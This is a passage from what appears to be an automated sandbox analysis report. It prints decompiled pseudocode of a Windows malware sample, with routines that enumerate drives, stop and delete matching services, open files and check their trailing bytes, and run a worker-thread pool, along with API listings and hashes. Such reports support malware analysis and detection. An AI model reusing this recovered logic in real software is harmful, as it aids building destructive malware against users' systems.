								_t30 =  *[fs:0x30];
								 *0x40f6f0( *((intOrPtr*)(_t30 + 0x1c)));
								_t37 =  *((intOrPtr*)(_t30 + 0x10));
								RtlInitUnicodeString(_t37 + 0x38,  *0x40f950);
								RtlInitUnicodeString(_t37 + 0x40,  *0x40f954);
								 *0x40f6f4( *((intOrPtr*)(_t30 + 0x1c)));
								return  *0x40f704(0, E00402322, _t30);
							}
						}
					}
				}
				return _t12;
			}










                                                                                        0x00402372
                                                                                        0x0040238d
                                                                                        0x0040239a
                                                                                        0x004023b4
                                                                                        0x004023c1
                                                                                        0x004023db
                                                                                        0x004023e8
                                                                                        0x004023f4
                                                                                        0x004023ff
                                                                                        0x00402409
                                                                                        0x0040240e
                                                                                        0x00402412
                                                                                        0x0040241f
                                                                                        0x0040242f
                                                                                        0x00402438
                                                                                        0x0040243e
                                                                                        0x00402448
                                                                                        0x00402456
                                                                                        0x0040245d
                                                                                        0x00402468
                                                                                        0x0040246e
                                                                                        0x00402478
                                                                                        0x0040247e
                                                                                        0x0040248b
                                                                                        0x0040249b
                                                                                        0x004024a4
                                                                                        0x00000000
                                                                                        0x004024b2
                                                                                        0x00402412
                                                                                        0x004023e8
                                                                                        0x004023c1
                                                                                        0x004024c0

                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(000000FF,0040F958,00000000,00001000,00003000,00000004), ref: 0040238D
                                                                                        • NtAllocateVirtualMemory.NTDLL(000000FF,0040F954,00000000,00001000,00003000,00000004), ref: 004023B4
                                                                                        • NtAllocateVirtualMemory.NTDLL(000000FF,0040F950,00000000,00001000,00003000,00000004), ref: 004023DB
                                                                                          • Part of subcall function 00401A3A: wcslen.NTDLL ref: 00401A49
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • wcscpy.NTDLL ref: 0040241F
                                                                                        • wcscat.NTDLL ref: 0040242F
                                                                                        • wcslen.NTDLL ref: 0040244B
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402468
                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00402478
                                                                                        • RtlInitUnicodeString.NTDLL(?), ref: 0040248B
                                                                                        • RtlInitUnicodeString.NTDLL(?), ref: 0040249B
                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 004024A4
                                                                                        • LdrEnumerateLoadedModules.NTDLL(00000000,00402322,00000030), ref: 004024B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Allocate$MemoryVirtual$CriticalHeapInitSectionStringUnicodewcslen$EnterEnumerateFreeLeaveLoadedModuleswcscatwcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 2163445147-0
                                                                                        • Opcode ID: 1d62d6b59a3412c9bac590a29e8f3883147ab6c5f25ced12b31406c9b8b6eaeb
                                                                                        • Instruction ID: 3b7a80a09a9bfcfe26515e31e10af39c546ca5dec5a795d16e9a90de9f9f921e
                                                                                        • Opcode Fuzzy Hash: 1d62d6b59a3412c9bac590a29e8f3883147ab6c5f25ced12b31406c9b8b6eaeb
                                                                                        • Instruction Fuzzy Hash: 2A3190B1141206BBD721AB94EE49F5A3B2CFB04B15F200235FA10B29F0C7B9691DCB2C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00407D8B, Relevance: 16.6, APIs: 11, Instructions: 120memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 58%
                                                                                        			E00407D8B() {
				intOrPtr _v8;
				union _ULARGE_INTEGER _v12;
				intOrPtr _v16;
				union _ULARGE_INTEGER _v20;
				void* _v24;
				unsigned int _v28;
				void* _v32;
				char _v44;
				intOrPtr* _t38;
				int _t42;
				signed int _t52;
				long _t54;
				unsigned int _t55;
				void* _t57;
				void* _t59;
				WCHAR* _t60;
				void* _t61;

				_v24 = 0;
				_t54 = GetLogicalDriveStringsW(0, 0);
				if(_t54 != 0) {
					_v32 = RtlAllocateHeap( *0x40f5d6, 8, _t54 * 2);
					if(_v32 != 0) {
						_t55 = GetLogicalDriveStringsW(_t54, _v32);
						if(_t55 != 0) {
							_t38 =  &_v44;
							 *_t38 = 0x750025;
							 *((intOrPtr*)(_t38 + 4)) = 0x25002f;
							 *((intOrPtr*)(_t38 + 8)) = 0x75;
							_v24 = RtlAllocateHeap( *0x40f5d6, 8, _t55 * 4 * 8);
							if(_v24 != 0) {
								_v28 = _t55 >> 2;
								_t57 = 0;
								_t60 = _v32;
								_t59 = _v24;
								do {
									_t42 = GetDriveTypeW(_t60);
									if(_t42 == 3 || _t42 == 2 || _t42 == 4) {
										if(GetDiskFreeSpaceExW(_t60, 0,  &_v12,  &_v20) == 0) {
											_t60 =  &(_t60[4]);
										} else {
											if(_t57 == 0) {
												_t57 = _t57 + 1;
											} else {
												asm("stosw");
											}
											asm("movsd");
											_t52 =  *0x40f69c(_t59,  &_v44,  *0x40f6a8(_v20.LowPart, _v16, 0x40000000, 0,  *0x40f6a8(_v12.LowPart, _v8, 0x40000000, 0)));
											_t61 = _t61 + 8;
											_t59 = _t59 + _t52 * 2;
											_t60 =  &(_t60[2]);
										}
									} else {
										_t60 =  &(_t60[4]);
									}
									_v28 = _v28 - 1;
								} while (_v28 != 0);
								_v24 = RtlReAllocateHeap( *0x40f5d6, 0, _v24, 2 + wcslen(_v24) * 2);
							} else {
							}
						} else {
						}
					} else {
					}
				} else {
				}
				return _v24;
			}




















                                                                                        0x00407d96
                                                                                        0x00407da7
                                                                                        0x00407dab
                                                                                        0x00407dc8
                                                                                        0x00407dcf
                                                                                        0x00407de0
                                                                                        0x00407de4
                                                                                        0x00407deb
                                                                                        0x00407dee
                                                                                        0x00407df4
                                                                                        0x00407dfb
                                                                                        0x00407e1f
                                                                                        0x00407e26
                                                                                        0x00407e30
                                                                                        0x00407e33
                                                                                        0x00407e35
                                                                                        0x00407e38
                                                                                        0x00407e3b
                                                                                        0x00407e3c
                                                                                        0x00407e45
                                                                                        0x00407e64
                                                                                        0x00407eb2
                                                                                        0x00407e66
                                                                                        0x00407e68
                                                                                        0x00407e72
                                                                                        0x00407e6a
                                                                                        0x00407e6e
                                                                                        0x00407e6e
                                                                                        0x00407e73
                                                                                        0x00407ea1
                                                                                        0x00407ea7
                                                                                        0x00407eaa
                                                                                        0x00407ead
                                                                                        0x00407ead
                                                                                        0x00407eb7
                                                                                        0x00407eb7
                                                                                        0x00407eb7
                                                                                        0x00407eba
                                                                                        0x00407ebd
                                                                                        0x00407eec
                                                                                        0x00000000
                                                                                        0x00407e28
                                                                                        0x00000000
                                                                                        0x00407de6
                                                                                        0x00000000
                                                                                        0x00407dd1
                                                                                        0x00000000
                                                                                        0x00407dad
                                                                                        0x00407efa

                                                                                        APIs
                                                                                        • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 00407DA1
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00407DC2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: AllocateDriveHeapLogicalStrings
                                                                                        • String ID:
                                                                                        • API String ID: 1399632231-0
                                                                                        • Opcode ID: fe186e1c3b3471462df1a70b8213717ead9c17b0c5c4698b4361782092673927
                                                                                        • Instruction ID: 05f4f3b8232e19daf0ced0677554b8691ecacac32b18da1b9a772accac604e03
                                                                                        • Opcode Fuzzy Hash: fe186e1c3b3471462df1a70b8213717ead9c17b0c5c4698b4361782092673927
                                                                                        • Instruction Fuzzy Hash: 56417F71D05209AFDB209F90DD45BAFBB78FB18301F100436E901B22A0D7756D19CBAA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004046E2, Relevance: 16.6, APIs: 11, Instructions: 102servicememoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 79%
                                                                                        			E004046E2() {
				void* _v8;
				void* _v12;
				void* _v16;
				long _v20;
				char _v24;
				struct _SERVICE_STATUS _v52;
				int _t34;
				short** _t46;
				void* _t47;

				_v8 = 0;
				_v16 = 0;
				_t34 = OpenSCManagerW(0, 0, 4);
				_v8 = _t34;
				if(_v8 == 0) {
					L8:
					if(_v8 != 0) {
						_t34 = CloseServiceHandle(_v8);
					}
					if(_v16 == 0) {
						return _t34;
					} else {
						return RtlFreeHeap( *0x40f5d6, 0, _v16);
					}
				}
				_v20 = 0;
				 *0x40f7ec(_v8, 0, 0x30, 3, 0, _v20,  &_v20,  &_v24, 0, 0);
				_t34 = RtlAllocateHeap( *0x40f5d6, 8, _v20);
				_v16 = _t34;
				if(_v16 == 0) {
					goto L8;
				}
				_t34 =  *0x40f7ec(_v8, 0, 0x30, 3, _v16, _v20,  &_v20,  &_v24, 0, 0);
				if(_t34 == 0) {
					goto L8;
				}
				_t46 = _v16;
				do {
					_t34 = E00404812( *_t46);
					if(_t34 != 0) {
						_t34 = OpenServiceW(_v8,  *_t46, 0x10020);
						_v12 = _t34;
						if(_v12 != 0) {
							memset( &_v52, 0, 0x1c);
							_t47 = _t47 + 0xc;
							ControlService(_v12, 1,  &_v52);
							DeleteService(_v12);
							_t34 = CloseServiceHandle(_v12);
						}
					}
					_t46 =  &(_t46[0xb]);
					_v24 = _v24 - 1;
				} while (_v24 != 0);
				goto L8;
			}












                                                                                        0x004046ed
                                                                                        0x004046f4
                                                                                        0x00404701
                                                                                        0x00404707
                                                                                        0x0040470e
                                                                                        0x004047e3
                                                                                        0x004047e7
                                                                                        0x004047ec
                                                                                        0x004047ec
                                                                                        0x004047f6
                                                                                        0x00404811
                                                                                        0x004047f8
                                                                                        0x00000000
                                                                                        0x00404803
                                                                                        0x004047f6
                                                                                        0x00404714
                                                                                        0x00404735
                                                                                        0x00404746
                                                                                        0x0040474c
                                                                                        0x00404753
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404774
                                                                                        0x0040477c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040477e
                                                                                        0x00404781
                                                                                        0x00404783
                                                                                        0x0040478a
                                                                                        0x00404796
                                                                                        0x0040479c
                                                                                        0x004047a3
                                                                                        0x004047ad
                                                                                        0x004047b3
                                                                                        0x004047bf
                                                                                        0x004047c8
                                                                                        0x004047d1
                                                                                        0x004047d1
                                                                                        0x004047a3
                                                                                        0x004047d7
                                                                                        0x004047da
                                                                                        0x004047dd
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000004,?,?,?,?,00000000), ref: 00404701
                                                                                        • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,00000000), ref: 00404735
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00404746
                                                                                        • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,00000000), ref: 00404774
                                                                                          • Part of subcall function 00404812: _wcslwr.NTDLL ref: 0040482F
                                                                                          • Part of subcall function 00404812: wcsstr.NTDLL ref: 0040483C
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00010020,00000000,?,?,?,?,00000000), ref: 00404796
                                                                                        • memset.NTDLL ref: 004047AD
                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,00000000), ref: 004047BF
                                                                                        • DeleteService.ADVAPI32(00000000,?,?,00000000), ref: 004047C8
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00000000), ref: 004047D1
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,00000000), ref: 004047EC
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404803
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Service$CloseEnumHandleHeapOpenServicesStatus$AllocateControlDeleteFreeManager_wcslwrmemsetwcsstr
                                                                                        • String ID:
                                                                                        • API String ID: 1445065125-0
                                                                                        • Opcode ID: 4cc05fddb3bf86c26c3dd707e134e0c0fb8ea13cf5960c70125b0902bb28b876
                                                                                        • Instruction ID: 7b21f04274218579ce4f942442c5d077116fc12ed2bb66dee62ae09e5a85a8a4
                                                                                        • Opcode Fuzzy Hash: 4cc05fddb3bf86c26c3dd707e134e0c0fb8ea13cf5960c70125b0902bb28b876
                                                                                        • Instruction Fuzzy Hash: 2541F571940209FBEB219B90DD0ABAEBB79FB48701F204076F600B65E0D7B51A58EB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401B91, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76memoryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00401B91(wchar_t* _a4) {
				union _FINDEX_INFO_LEVELS _v8;
				void* _v12;
				long _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				intOrPtr* _t41;

				_v8 = 1;
				_v20 = 0;
				if(_a4 == 0) {
					L10:
					return _v8;
				}
				_v20 = RtlAllocateHeap( *0x40f5d6, 8, 6 + wcslen(_a4) * 2);
				if(_v20 == 0) {
					L8:
					if(_v20 != 0) {
						RtlFreeHeap( *0x40f5d6, 0, _v20);
					}
					goto L10;
				}
				wcscpy(_v20, _a4);
				E00401A3A(_v20);
				_v16 = 0x2a;
				wcscat(_v20,  &_v16);
				_v12 = FindFirstFileExW(_v20, 0,  &_v612, 0, 0, 0);
				if(_v12 == 0xffffffff) {
					goto L8;
				} else {
					goto L3;
				}
				while(1) {
					L3:
					_t41 =  &(_v612.cFileName);
					if( *_t41 != 0x2e &&  *_t41 != 0x2e002e) {
						break;
					}
					if(FindNextFileW(_v12,  &_v612) != 0) {
						continue;
					}
					L7:
					FindClose(_v12);
					goto L8;
				}
				_v8 = 0;
				goto L7;
			}









                                                                                        0x00401b9f
                                                                                        0x00401ba6
                                                                                        0x00401bb1
                                                                                        0x00401c85
                                                                                        0x00401c90
                                                                                        0x00401c90
                                                                                        0x00401bd9
                                                                                        0x00401be0
                                                                                        0x00401c6e
                                                                                        0x00401c72
                                                                                        0x00401c7f
                                                                                        0x00401c7f
                                                                                        0x00000000
                                                                                        0x00401c72
                                                                                        0x00401bec
                                                                                        0x00401bf8
                                                                                        0x00401bfd
                                                                                        0x00401c0b
                                                                                        0x00401c2c
                                                                                        0x00401c33
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00401c35
                                                                                        0x00401c35
                                                                                        0x00401c35
                                                                                        0x00401c3e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00401c63
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00401c65
                                                                                        0x00401c68
                                                                                        0x00000000
                                                                                        0x00401c68
                                                                                        0x00401c48
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 00401BBA
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,?), ref: 00401BD3
                                                                                        • wcscpy.NTDLL ref: 00401BEC
                                                                                          • Part of subcall function 00401A3A: wcslen.NTDLL ref: 00401A49
                                                                                        • wcscat.NTDLL ref: 00401C0B
                                                                                        • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00401C26
                                                                                        • FindNextFileW.KERNEL32(000000FF,?), ref: 00401C5B
                                                                                        • FindClose.KERNEL32(000000FF), ref: 00401C68
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401C7F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Find$FileHeapwcslen$AllocateCloseFirstFreeNextwcscatwcscpy
                                                                                        • String ID: *
                                                                                        • API String ID: 3715368164-163128923
                                                                                        • Opcode ID: 5bb33ceab6d48ddc35f9fabd0b86a1041bd89a4ab9340b049d53e8b49033b090
                                                                                        • Instruction ID: 6ab97323bd2829a0b91d296578501e68c6c48c4c000942d48e46d5a9f2b85c6b
                                                                                        • Opcode Fuzzy Hash: 5bb33ceab6d48ddc35f9fabd0b86a1041bd89a4ab9340b049d53e8b49033b090
                                                                                        • Instruction Fuzzy Hash: 8C316670944218EFEB209F94DD4CBAEBBB8FB04301F000576F811B11B0D7B65AA9DB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405C1C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 126filenativenetworkCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 68%
                                                                                        			E00405C1C(WCHAR* _a4) {
				struct _OVERLAPPED* _v8;
				void* _v12;
				long _v16;
				char _v32;
				void _v160;
				void* _t31;

				_v8 = 0;
				_v12 = 0xffffffff;
				if(SetFileAttributesW(_a4, 0x80) != 0) {
					while(1) {
						_v12 = CreateFileW(_a4, 0xc0000000, 0, 0, 3, 0xa000080, 0);
						if(_v12 != 0xffffffff) {
							break;
						}
						if( *[fs:0x34] != 0x20) {
							return 0xffffffff;
						} else {
							if(PathIsNetworkPathW(_a4) == 0) {
								if(E004056D4(_a4) == 0) {
									return 0xffffffff;
								} else {
									continue;
								}
							} else {
								return 0xffffffff;
							}
						}
						goto L22;
					}
					asm("sbb edx, 0x0");
					_push(2);
					if(SetFilePointerEx(_v12, 0xffffffffffffff70, 0, 0) != 0) {
						if(ReadFile(_v12,  &_v160, 0x90,  &_v16, 0) != 0) {
							_t31 = E00401060( &_v160, 0x80, 0);
							_push(0x10);
							_push( &_v32);
							_push(_t31);
							if( *0x40f670() == 0) {
								_v8 = 1;
							}
						} else {
							_v8 =  *[fs:0x34];
						}
					} else {
						if( *[fs:0x34] != 0x83) {
							_v8 =  *[fs:0x34];
						}
					}
					goto L19;
				} else {
					_v8 =  *[fs:0x34];
					L19:
					if(_v12 != 0xffffffff) {
						NtClose(_v12);
					}
					return _v8;
				}
				L22:
			}









                                                                                        0x00405c2a
                                                                                        0x00405c31
                                                                                        0x00405c48
                                                                                        0x00405c58
                                                                                        0x00405c73
                                                                                        0x00405c7a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405c84
                                                                                        0x00405cd0
                                                                                        0x00405c86
                                                                                        0x00405c91
                                                                                        0x00405cad
                                                                                        0x00405cbe
                                                                                        0x00405caf
                                                                                        0x00000000
                                                                                        0x00405caf
                                                                                        0x00405c93
                                                                                        0x00405ca0
                                                                                        0x00405ca0
                                                                                        0x00405c91
                                                                                        0x00000000
                                                                                        0x00405c84
                                                                                        0x00405ce0
                                                                                        0x00405ce3
                                                                                        0x00405cf4
                                                                                        0x00405d2b
                                                                                        0x00405d46
                                                                                        0x00405d4d
                                                                                        0x00405d52
                                                                                        0x00405d53
                                                                                        0x00405d5f
                                                                                        0x00405d61
                                                                                        0x00405d61
                                                                                        0x00405d2d
                                                                                        0x00405d33
                                                                                        0x00405d33
                                                                                        0x00405cf6
                                                                                        0x00405d01
                                                                                        0x00405d09
                                                                                        0x00405d09
                                                                                        0x00405d0c
                                                                                        0x00000000
                                                                                        0x00405c4a
                                                                                        0x00405c50
                                                                                        0x00405d68
                                                                                        0x00405d6c
                                                                                        0x00405d71
                                                                                        0x00405d71
                                                                                        0x00405d82
                                                                                        0x00405d82
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • SetFileAttributesW.KERNEL32(FFFFFFFF,00000080,00000000,?,?,?,?), ref: 00405C40
                                                                                        • CreateFileW.KERNEL32(FFFFFFFF,C0000000,00000000,00000000,00000003,0A000080,00000000,?,?,?,?), ref: 00405C6D
                                                                                        • PathIsNetworkPathW.SHLWAPI(000000FF,?,?,?,?), ref: 00405C89
                                                                                        • NtClose.NTDLL(000000FF), ref: 00405D71
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FilePath$AttributesCloseCreateNetwork
                                                                                        • String ID: 7i@
                                                                                        • API String ID: 3671890030-478591865
                                                                                        • Opcode ID: cf3ac0fa73f10cbcd365883bd56ff140fd0d9c445b960b42ebe3a4dcfcf0f0e1
                                                                                        • Instruction ID: 52bbefc15f8ddbc189afc50005a0517713c68715ee7d1ee3340e77ccf8934772
                                                                                        • Opcode Fuzzy Hash: cf3ac0fa73f10cbcd365883bd56ff140fd0d9c445b960b42ebe3a4dcfcf0f0e1
                                                                                        • Instruction Fuzzy Hash: 8841D632604608EFEB208B64ED05BAFB7B8EB40761F208277F510F62D0D7355A45DA69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004069E1, Relevance: 13.6, APIs: 9, Instructions: 98nativethreadsleepCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 90%
                                                                                        			E004069E1(WCHAR* _a4) {
				unsigned int _v8;
				long _v12;
				void* _v268;
				void* _t22;
				void* _t29;
				intOrPtr _t31;
				void* _t32;
				long _t33;
				unsigned int _t35;
				void* _t42;

				_v8 = 0;
				 *0x40f9ec = 0;
				 *0x40f9f0 = 0;
				_t31 =  *0x40f5de; // 0x4
				_t32 =  >  ? 0x20 : _t31;
				if(E004016D2() <= 0x3c) {
					_v12 = 0;
				} else {
					_v12 = 2;
				}
				_t22 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
				 *0x40f9e8 = _t22;
				if( *0x40f9e8 != 0) {
					do {
						CreateThread(0, 0,  &M004059B7, 0, 0, 0);
						asm("stosd");
						_v8 = _v8 + 1;
						CreateThread(0, 0,  &M004059B7, 0, 0, 0);
						asm("stosd");
						_v8 = _v8 + 1;
						_t32 = _t32 - 1;
					} while (_t32 != 0);
					E004066AC(_a4, _v12);
					_t33 =  *0x40f9ec; // 0x0
					while(1) {
						_t42 = _t33 -  *0x40f9f0; // 0x0
						if(_t42 == 0) {
							break;
						}
						Sleep(0x64);
					}
					_t35 = _v8 >> 1;
					do {
						PostQueuedCompletionStatus( *0x40f9e8, 0, 0, 0);
						PostQueuedCompletionStatus( *0x40f9e8, 0, 0, 0);
						_t35 = _t35 - 1;
					} while (_t35 != 0);
					_t29 = WaitForMultipleObjects(_v8,  &_v268, 1, 0xffffffff);
					do {
						asm("lodsd");
						_t29 = NtClose(_t29);
						_v8 = _v8 - 1;
					} while (_v8 != 0);
					return NtClose( *0x40f9e8);
				}
				return _t22;
			}













                                                                                        0x004069ef
                                                                                        0x004069f6
                                                                                        0x00406a00
                                                                                        0x00406a0a
                                                                                        0x00406a17
                                                                                        0x00406a22
                                                                                        0x00406a2d
                                                                                        0x00406a24
                                                                                        0x00406a24
                                                                                        0x00406a24
                                                                                        0x00406a3c
                                                                                        0x00406a42
                                                                                        0x00406a4e
                                                                                        0x00406a5a
                                                                                        0x00406a69
                                                                                        0x00406a6f
                                                                                        0x00406a70
                                                                                        0x00406a82
                                                                                        0x00406a88
                                                                                        0x00406a89
                                                                                        0x00406a8c
                                                                                        0x00406a8d
                                                                                        0x00406a97
                                                                                        0x00406a9c
                                                                                        0x00406aac
                                                                                        0x00406aac
                                                                                        0x00406ab2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406aa6
                                                                                        0x00406aa6
                                                                                        0x00406ab7
                                                                                        0x00406ab9
                                                                                        0x00406ac5
                                                                                        0x00406ad7
                                                                                        0x00406add
                                                                                        0x00406ade
                                                                                        0x00406af0
                                                                                        0x00406afc
                                                                                        0x00406afc
                                                                                        0x00406afe
                                                                                        0x00406b04
                                                                                        0x00406b07
                                                                                        0x00000000
                                                                                        0x00406b13
                                                                                        0x00406b21

                                                                                        APIs
                                                                                        • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00406A3C
                                                                                        • CreateThread.KERNEL32(00000000,00000000,004059B7,00000000,00000000,00000000), ref: 00406A69
                                                                                        • CreateThread.KERNEL32(00000000,00000000,004059B7,00000000,00000000,00000000), ref: 00406A82
                                                                                        • Sleep.KERNEL32(00000064,00000000,00000000,?,?,?,?,00000000), ref: 00406AA6
                                                                                        • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00406AC5
                                                                                        • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00406AD7
                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF,?,?,?,?,00000000), ref: 00406AF0
                                                                                        • NtClose.NTDLL(00000000), ref: 00406AFE
                                                                                        • NtClose.NTDLL ref: 00406B13
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CompletionCreate$ClosePostQueuedStatusThread$MultipleObjectsPortSleepWait
                                                                                        • String ID:
                                                                                        • API String ID: 3633580606-0
                                                                                        • Opcode ID: 056b8717cc3ed2e8911cffa5a95cd8b0457347a69ae6303a75ded4c3762f9ed2
                                                                                        • Instruction ID: 0a42052cba57e97a3e8f719e6b38bf7a2cfbbc2a083453ee87ca424c5327b4bf
                                                                                        • Opcode Fuzzy Hash: 056b8717cc3ed2e8911cffa5a95cd8b0457347a69ae6303a75ded4c3762f9ed2
                                                                                        • Instruction Fuzzy Hash: 8A3149B0641304BBEB20AB94EE4AB9A7B74EB10711F200176F6017A5E1C7B529999F1D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00408016, Relevance: 13.6, APIs: 9, Instructions: 93memoryregistrynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00408016() {
				void* _v8;
				void* _v12;
				int _v16;
				int _v20;
				int _v24;
				short* _v28;
				short* _v32;
				short* _v36;
				long _v52;
				long _t43;

				_v8 = 0;
				_v28 = E00401D08(0x40ef14);
				_v32 = E00401D08(0x40ef50);
				_v36 = E00401D08(0x40ef6a);
				if(RegCreateKeyExW(0x80000001, _v28, 0, 0, 0, 0x20119, 0,  &_v12,  &_v24) == 0) {
					_v16 = 1;
					_v20 = 0x10;
					_t43 = RegQueryValueExW(_v12, _v32, 0,  &_v16,  &_v52,  &_v20);
					if(_t43 != 0) {
						_t43 = RegQueryValueExW(_v12, _v36, 0,  &_v16,  &_v52,  &_v20);
					}
					if(_t43 == 0) {
						_v8 = RtlAllocateHeap( *0x40f5d6, 8, _v20);
						if(_v8 != 0) {
							wcscpy(_v8,  &_v52);
						}
					}
